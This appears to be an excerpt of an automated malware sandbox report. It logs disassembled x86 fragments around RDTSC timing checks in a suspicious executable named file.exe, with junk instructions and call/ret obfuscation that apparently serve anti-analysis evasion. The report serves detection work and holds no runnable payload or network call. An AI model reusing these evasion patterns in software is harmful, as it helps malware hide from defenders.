Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63728C second address: 637291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637291 second address: 637317 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f jo 00007F6C544CAC28h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 nop 0x00000019 mov dword ptr [ebp+122D25DCh], esi 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D2BC7h] 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F6C544CAC28h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 add edi, dword ptr [ebp+122D2C63h] 0x00000049 push ebx 0x0000004a xor dword ptr [ebp+1247D664h], ebx 0x00000050 pop ebx 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F6C544CAC36h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637317 second address: 637321 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6C54B5854Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 637321 second address: 637335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6C544CAC2Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638288 second address: 63828C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63828C second address: 63830A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6C544CAC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D25CCh], ebx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F6C544CAC28h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov ebx, esi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F6C544CAC28h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jp 00007F6C544CAC26h 0x00000058 jmp 00007F6C544CAC39h 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638578 second address: 63857D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63B370 second address: 63B391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63B391 second address: 63B396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63A543 second address: 63A548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6394FA second address: 6394FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63A548 second address: 63A55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6C544CAC26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6395C0 second address: 6395C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63B547 second address: 63B558 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C544CAC28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63FB7D second address: 63FB88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F6C54B58546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63D680 second address: 63D686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 640CAC second address: 640CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 640CB0 second address: 640D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F6C544CAC28h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D3359h], esi 0x00000028 mov ebx, dword ptr [ebp+122D29AFh] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F6C544CAC28h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov di, D545h 0x0000004e and bl, FFFFFFA4h 0x00000051 push 00000000h 0x00000053 mov ebx, ecx 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F6C544CAC39h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63FE6C second address: 63FE72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63FE72 second address: 63FE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63FE76 second address: 63FE7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 641C62 second address: 641C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 641C67 second address: 641C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C54B5854Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 641C78 second address: 641C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 641C7C second address: 641CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov di, bx 0x0000000e je 00007F6C54B5855Ch 0x00000014 call 00007F6C54B58554h 0x00000019 clc 0x0000001a pop ebx 0x0000001b push 00000000h 0x0000001d mov ebx, dword ptr [ebp+122D29AFh] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F6C54B58548h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f push edx 0x00000040 jmp 00007F6C54B58552h 0x00000045 pop edi 0x00000046 sub bl, FFFFFFC1h 0x00000049 xchg eax, esi 0x0000004a push ecx 0x0000004b push eax 0x0000004c push edx 0x0000004d push edi 0x0000004e pop edi 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 645BDE second address: 645BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F6C544CAC26h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 645BEB second address: 645BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6C54B58546h 0x0000000a jnc 00007F6C54B58546h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 647A1D second address: 647A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65282C second address: 652830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65290C second address: 652910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652910 second address: 652916 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652916 second address: 65292F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C544CAC35h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 656180 second address: 6561A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58555h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F6C54B5854Ch 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6561A9 second address: 6561BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC31h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65671D second address: 656721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 656721 second address: 656725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 656725 second address: 65673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 ja 00007F6C54B5855Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F6C54B58546h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 656B61 second address: 656BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC36h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6C544CAC35h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6C544CAC34h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 656CE2 second address: 656D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6C54B5854Eh 0x0000000a jmp 00007F6C54B58556h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F6C54B58546h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 656D14 second address: 656D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658A69 second address: 658A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658A6F second address: 658A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B523 second address: 65B527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B527 second address: 65B537 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6C544CAC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B537 second address: 65B540 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 660D3C second address: 660D46 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6C544CAC2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 660D46 second address: 660D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007F6C54B58546h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F6C54B5854Bh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 660D6D second address: 660D82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6C544CAC2Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65F8CB second address: 65F8CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65F8CF second address: 65F8D9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6C544CAC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65F8D9 second address: 65F8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6C54B58546h 0x0000000a jl 00007F6C54B58546h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65FA5E second address: 65FA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65FA62 second address: 65FA77 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6C54B58546h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jc 00007F6C54B58546h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65FA77 second address: 65FA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65FBF8 second address: 65FC0B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F6C54B58564h 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 660053 second address: 660084 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6C544CAC39h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F6C544CAC38h 0x00000010 ja 00007F6C544CAC32h 0x00000016 je 00007F6C544CAC26h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6601CA second address: 6601E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6C54B5854Ch 0x0000000a pop ebx 0x0000000b jo 00007F6C54B58568h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 660341 second address: 660350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6C544CAC26h 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 660350 second address: 66035C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6C54B58546h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 660609 second address: 66060D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66060D second address: 660623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58552h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 660623 second address: 660668 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F6C544CAC38h 0x00000008 jc 00007F6C544CAC26h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F6C544CAC4Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6C544CAC39h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60CC85 second address: 60CC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 660BBF second address: 660BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6662C2 second address: 6662C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6662C6 second address: 6662E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC37h 0x00000007 jl 00007F6C544CAC26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6662E7 second address: 6662ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6662ED second address: 6662F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6662F1 second address: 6662F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6662F5 second address: 666305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F6C544CAC26h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E6A76 second address: 5E6A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B58550h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E6A8B second address: 5E6A9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Ch 0x00000007 push esi 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 665208 second address: 66522A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58551h 0x00000007 push edx 0x00000008 jmp 00007F6C54B5854Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62DDBC second address: 62DDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62DF59 second address: 62DF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62DF5D second address: 62DF63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62DF63 second address: 62DF7B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6C54B58548h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e je 00007F6C54B58546h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62DF7B second address: 62DF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E248 second address: 62E24C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E47A second address: 62E49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 ja 00007F6C544CAC26h 0x0000000b pop ebx 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6C544CAC2Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E577 second address: 62E57D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E782 second address: 62E794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jnc 00007F6C544CAC26h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E794 second address: 62E7CD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6C54B5855Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F6C54B5854Fh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edx 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E8B4 second address: 62E8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F6C544CAC28h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E8CC second address: 62E8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62EDBE second address: 62EDC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62EDC3 second address: 62EDC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62EDC9 second address: 62EDE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F6C544CAC28h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F1E0 second address: 62F1F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F1F0 second address: 62F1F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F34F second address: 62F353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F353 second address: 62F36E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 665883 second address: 66589F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58558h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
